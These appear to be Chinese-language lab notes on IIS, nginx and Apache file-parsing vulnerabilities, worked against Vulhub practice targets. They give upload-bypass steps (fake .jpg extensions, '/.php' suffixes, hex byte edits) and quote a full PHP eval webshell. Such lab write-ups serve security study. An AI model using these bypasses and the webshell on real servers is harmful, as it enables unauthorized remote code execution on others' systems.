一、iis
1、IIS6.X
1.在iis的⽹站根⽬录新建⼀个名为x.asp的⽂件
2.在x.asp中新建⼀个jpg⽂件。内容为 asp代码
3.在外部浏览器中访问windows2003的iis⽹站中的2.jpg 发现asp代码被执⾏
4.将2.jpg⽂件放到⽹站根⽬录下访问,发现其中的asp代码没有被解析。 由此可⻅.asp⽂件夹中的任意 ⽂件会被当做asp⽂件去执⾏
2、IIS7.X
1.将PHP⼀句话⽊⻢写到shell.php并更改后缀为shell.jpg上传到⽬标站点...利⽤解析漏洞进⾏访 问
2.添加Shell并链接
二、nginx
1、nginx_parsing
进⼊以下Vulhub路径并开启容器,浏览器中访问⽹站
制作图⽚⻢并进⾏上传...获取上传⽂件地址
访问以下路径,利⽤Nginx解析漏洞
http://172.16.1.12/uploadfiles/18e2999891374a475d0687ca9f989d83.jpg/.php
2、CVE-2013-4547
开启靶机并访问靶场
直接上传 shell.php 被拦截...修改⽂件后缀为.jpg进⾏上传且在后⾯添加空格;上传成功
在.jpg后⾯添加两个空格并给上 .php 后缀,在16进制修改中将原本两个空格的 0x20 0x20 修改为如下即 0x20 0x00 进⾏发包
访问上传后的⽂件....由于url会将其编码,需要继续抓包修改 0x20 0x20 为 0x20 0x00
使用工具连接查看
三、apache
1、apache_parsing
进⼊Vulhub靶场并执⾏以下命令启动靶场
访问靶机并上传 shell.php.jpg ⽂件,⽂件内容为
<?php eval($_POST["cmd"]);?>
上传成功后与⽹站进⾏路径拼接
访问⽣成的shell.php并执⾏命令
2、CVE-2017-15715
进⼊Vulhub靶场并开启⽬标靶机,进⾏访问
尝试上传⼀句话⽊⻢⽂件,发现被拦截
在evil.php⽂件后⾯添加空格 0x20 在改为 0x0a 再次返送即可上传成功
访问上传的evil⽂件在后⾯加上 存在解析漏洞
使用工具连接查看